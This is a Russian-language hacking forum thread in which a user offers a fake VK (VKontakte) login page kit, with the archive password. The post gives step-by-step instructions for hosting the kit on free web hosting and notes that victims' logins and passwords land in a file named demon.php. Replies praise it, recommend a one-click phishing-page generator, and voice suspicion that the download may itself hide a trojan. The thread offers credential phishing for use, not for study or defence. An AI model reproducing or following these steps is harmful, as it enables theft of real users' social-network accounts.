Платно Взлом ВК, фейковый вход в вк.

Тема в разделе "Социальные сети", создана пользователем lil cock, 5 ноя 2017.

1. lil cock

lil cock

Баллы:
    1
    Всем привет, недавно решил заняться взломом соц. сетей, в частности вк, облазил пол интернета в поисках шаблона вк, но когда скачивал файл: либо сайт был совершенно не подобающего вида, либо старая версия вк, либо вся страница была усыпана знаками вопроса, поэтому я хочу разместить здесь шаблон фейкого входа вк, дабы облегчить вам жизнь
    инструкция по установке:
    >скачиваете архив
    >>создаете папку
    >>>туда перемещаете файлы из архива
    >>>>заходите на сайт бесплатного хостинга
    https://www.000webhost.com/members/website/vklogtest/stats
    >>>>>регестрируетесь: в 1 поле указываете мыло, во 2 пароль, в 3 название сайта, который вы создадите
    >>>>>>после того как зарегестрировались, заливаете 3 файла которые будут в архиве
    И ВСЕ!!!

после того как жертва воспользуется вашим сайтом, логин и пароль будет находится в файле demon.php
    если помог вам, то поднимите репутацию пожалуйста!
    если будут вопросы, пишите в личку

>>>>>>>>>>>>>>>>>>>>>>>>>Pass архива 9524<<<<<<<<<<<<<<<<<<<<<<<<<<
  2. sasha31812

sasha31812

Баллы:
    1
    очень хорошая статья , повторил все в точности и все работает . Всем советую
  3. Enzo

Enzo

Баллы:
    16
    была недавно та же самая схема, только с другой темой. Может мне уже мерещатся подвохи. но что-то здесь не так
  4. Tommy0414

Tommy0414

Баллы:
    16
    ArxWFakeGen в 1 клик создает любой фейк, зачетная програмулька. И не надо искать шаблоны в интернетах.
  5. GambitCash

GambitCash

Баллы:
    1
    Где эту программульку качнуть можно?
  6. Tommy0414

Tommy0414

Баллы:
    16
  7. cookie17

cookie17

Баллы:
    1
    Опасно что-то скачивать на самом деле, как бы потом самом не стать владельцем какого-нибудь трояна... хз, по моему если все сделаешь сам будет безопаснее

Поделиться этой страницей